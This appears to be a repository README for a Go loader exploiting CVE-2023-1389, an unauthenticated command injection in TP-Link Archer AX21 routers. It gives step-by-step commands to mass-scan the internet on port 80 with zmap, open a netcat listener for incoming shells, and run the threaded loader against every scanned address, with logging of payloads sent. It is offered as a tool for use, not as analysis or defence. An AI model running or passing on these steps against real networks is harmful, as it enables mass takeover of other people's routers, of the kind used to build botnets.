/CVE-2023-1389

TP-Link Archer AX21 - Unauthenticated Command Injection [Loader]

Primary LanguageGo

TP-Link Archer AX21 - Unauthenticated Command Injection [Loader POC]

CVE-2023-1389

Exploit Title: TP-Link Archer AX21 - Unauthenticated Command Injection

Date Found : 07/25/2023

Exploit Author: Voyag3r

How to Use :-

*Scanning*
- Use Zmap  : zmap -p 80 -o list.txt 

*NetCat Listener
- apt install netcat -y
- nc lnvp <port>

*Loader
- go run . --host=<netcat_listener_ip> --port=<netcat_listener_port> --list=list.txt --threads=<threads>

* Logging
- Error : Webserver Inactive or unresponsive
- Success : Payload Sent with Request Code 200
- Status : Response Code